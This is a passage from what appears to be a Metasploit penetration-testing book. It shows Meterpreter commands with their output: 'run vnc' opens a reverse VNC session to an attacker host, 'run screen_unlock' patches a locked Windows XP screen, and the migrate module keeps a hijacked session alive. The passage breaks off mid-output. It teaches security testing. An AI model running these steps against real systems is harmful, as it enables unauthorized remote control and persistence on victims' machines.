92
Chapter 6
Using Meterpreter Scripts
Several external Meterpreter scripts can help you to enumerate a system or
perform predefined tasks inside the Meterpreter shell. We won’t cover every
script here, but we will mention a few of the most notable ones.
NOTE
The Meterpreter scripts are in the process of being moved to post exploitation modules.
We’ll cover both scripts and post exploitation modules in this chapter.
To run a script from the Meterpreter console, enter
run
scriptname
. The
script will either execute or provide additional help on how to run it.
Should you want to use an interactive remote GUI on the system, you
can use the VNC protocol to tunnel the active desktop communications
and interact with the GUI desktop on the target machine. But in some
cases, the system may be locked and you may be unable to access it. Never
fear: Metasploit has us covered.
In the following example, we issue the
run vnc
command, which installs a
VNC session on the remote system. From there, we launch
run screen_unlock
to unlock the target machine so that we can view the desktop. As a result, a
VNC window should appear, showing us the target desktop.
meterpreter >
run vnc
[*] Creating a VNC reverse tcp stager: LHOST=192.168.33.129 LPORT=4545)
[*] Running payload handler
[*] VNC stager executable 37888 bytes long
[*] Uploaded the VNC agent to C:\WINDOWS\TEMP\CTDWtQC.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.33.129:4545...
[*] VNC Server session 2 opened (192.168.33.129:4545 -> 192.168.33.130:1091)
This will give us a VNC graphical interface to the target machine and
allow us to interact through a desktop.
meterpreter >
run screen_unlock
[*] OS 'Windows XP (Build 2600, Service Pack 2).' found in known targets
[*] patching...
[*] done!
Migrating a Process
Often, when we are attacking a system and exploiting a service such as Inter-
net Explorer, if the target user closes the browser, the Meterpreter session
is also closed and we lose our connection to the target. To avoid this prob-
lem, we can use the
migrate
post exploitation module, shown next, to attempt
to migrate the service to a memory space that won’t close when the target
closes the browser. By migrating to a different, more stable process, we ensure
that the process isn’t closed and we maintain our connection to the system.
meterpreter >
run post/windows/manage/migrate
[*] Running module against V-MAC-XP
[*] Current server process: revterp.exe (2436)